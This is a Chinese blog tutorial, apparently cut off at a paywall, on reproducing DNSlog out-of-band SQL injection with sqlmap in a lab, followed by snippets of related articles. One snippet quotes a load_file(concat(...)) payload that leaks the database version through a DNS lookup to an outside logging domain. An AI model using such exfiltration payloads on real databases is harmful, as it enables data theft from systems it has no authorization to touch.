【sql注入】sqlmap+DNSlog外带数据 注入复现

DNSlog注入复现:sqlmap实战教程
最新推荐文章于 2025-03-14 22:29:10 发布
原创 最新推荐文章于 2025-03-14 22:29:10 发布 · 2.4k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #服务器 #安全

原文地址

【sql注入】sqlmap+DNSlog外带数据 注入复现 – Yoyo&Kiki's Blog (mylovekiki.top)

DNSlog注入

dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据

利用场景

在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入

MySql配置条件

配置文件 my.ini 中 secure_file_priv 需为空

  • secure_file_priv为空,可以读取磁盘的目录;
  • secure_file_priv为路径,可以读取路径中的文件;
  • secure_file_priv为null,load_file则不能加载文件。

复现

实验环境:

Windows Server 2008 R2(DNS服务器)IP:192.168.0.107

Kali(sqlmap)IP:192.168.0.108

Win11(靶机)IP:192.168.0.105

环境搭建

DNS服务器搭建

进入Windows Server 2008 R2

最低0.47元/天 解锁文章
sqlmap结合dnslog外带注入
newlife1441的博客
08-05 809
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
sqlmap结合dnslog注入
whojoe的博客
05-25 2407
sqlmap结合dnslog注入环境搭建1.phpstudy2.注入点3.配置mysql4.在线doslog网站5.sqlmap结合dnslog安装dns服务器添加转发(关键)复现手工注入sqlmap的--dns-domain参数注入参考文章 环境搭建 1.phpstudy 去官网下载安装 2.注入点 test.php <?php error_reporting(0); $link = mysqli_connect('localhost','root','root'); mysqli_set_char
SQL注入DnsLog注入
qq_52310755的博客
03-22 2492
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL注入DNSLog外带注入
dragon的博客
02-21 3762
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
sql注入利用dnslog外带数据快速注入
weixin_56023251的博客
08-08 2288
sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的注入结果。mysql读入文件时 首先需要将secure_file_priv的默认值为null ,只需要在my.ini修改secure_file_priv=''2.开启了LOAD_FILE() 读取文件的函数。.
https防止注入_数据DNSLog外带注入总结
weixin_39553600的博客
11-20 685
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
复现dns外带数据结合sqlmap
Alemon7777777的博客
08-06 594
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据服务器执行非授权的任意查询,从而进一步得到相应的数据信息。#查询库名#方一#方二#查询数据库的默认字符集#查询字符集的排序规则。...
第六天二次注入sqlmap简单参数
代码审计
03-09 3089
二次注入 今天学习二次注入 二次注入原理 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。 也就是说在应用程序中输入恶意造的数据库查询语句时会被转义,但是在数据库内部调用读取语句的时候又被还原。 二次注入,可以概括为以下两步: 第一
【渗透测试】DNSLog注入
ssrf
10-25 4184
目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、p
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1640
盲注代替 DNS log即DNS日志,域名解析的记录。
SQL注入DNSlog注入(DNS带外查询)
最新发布
2401_89233381的博客
03-14 1256
声明:DNSlog注入也是针对的情况。
sql注入攻击 外带数据
2301_81142776的博客
02-14 259
SQL盲注中,使用DNSLog + SQLMap外带数据是一种通过DNS查询将数据库中的数据外传到攻击者控制的DNS服务器的技术。DNSLog外带数据的核心思想是利用数据库函数触发DNS查询,并将查询结果(即外带数据)发送到攻击者控制的DNS服务器数据外带:DNS查询会被发送到攻击者控制的DNS服务器,攻击者可以从DNS日志中提取数据。DNS查询触发:通过SQL注入构造一个DNS查询请求,将目标数据作为查询的一部分。dns服务器配置(IP为所在服务器的主机)设置靶机的dns地址ip为配置的ip。
SQL注入之利用DNSlog外带盲注回显
baynk的博客
03-31 6682
0x00 SQL盲注 当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易被网站BAN掉IP,虽然也可以使用代理IP池,但是还是需要一种快速有效的方法来获取数据。 此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。 0x01 DNSlog利用条件 DBMS中需要有可...
mysql dns注入_SQL 注入-DNS 外带数据
weixin_35123047的博客
02-07 370
参考文章注:外带数据皆为数据库版本信息mysql条件:Windowsmysql.ini 中 secure_file_priv 必须为空,select @@secure_file_priv适用于联合注入或堆叠注入具体:利用 mysql (Windows 适用)中的 load_file() 函数select load_file(concat("\\\\",version(),".1ndex.dnslo...
DNS外带注入SQLMAP
qq_31088019的博客
08-06 679
dns外带数据
SQL注入 - Part 3(带外)
捡破烂日记^ ^
05-23 864
本篇主要是思路概述(sql注入新思路+waf)
sqlmap+dnslog注入复现
qq_50646296的博客
08-07 1100
2.准备两台虚拟机,一台为Kali(作为攻击机)另一台使用Windows server2008 R2(作为DNS服务器),使用本地物理机作为肉机。编辑本地肉机的dns设置,改为手动,首选DNS写windows server2008 的IP地址。查看secure_file_priv 是否为空值,如果是NULL,需要将其改为空。2 不存在,则在[mysqld]下,新增secure_file_priv=""。然后添加A记录,一条ns,作为域dns服务器,一条*匹配所有子域。配置DNS服务器ip信息和dns信息。.
SQL注入(Dns注入)---zkaq
weixin_38237216的博客
04-11 1862
1.概念 1.DNS-log:DNS是解析域名的,log是日志记录,DNS-log是记录域名解析记录日志 2.使用场景:在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 3.涉及的函数:LOAD_FILE():读取文件的函数—读取文件并返回文件内容为字符串 ​ a.配置文件中的参数secure_file_priv= ​ b.高版本mysql中会限制 ​ c.既然会被限制那有什么用呢?但是也会存在下面几种情况 有的版本会自动开启 有的网站需要
sqlmap dolog外带数据
Miracle_ze的博客
08-05 1123
首先要进行这次实验,我们电脑和虚拟机要带有sqlmap工具。Windows系统虚拟机在本次实验要使用mysql的读文件函数load_file,为此Load_file函数读mysql 的文件,但是要生效得 secure_file_priv不能是null才可以使用。 kali准备工作这里不写sqlmap更新。因为博主已经更新到目前最新的了因为前面已经说了这个只有读权限,为此要修改要去配置文件my.cnf 。 文件内添加内容: 查看是否修改了状态 成功启动并且版本为1.6.7服务器角色创建服务器为DNS服
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值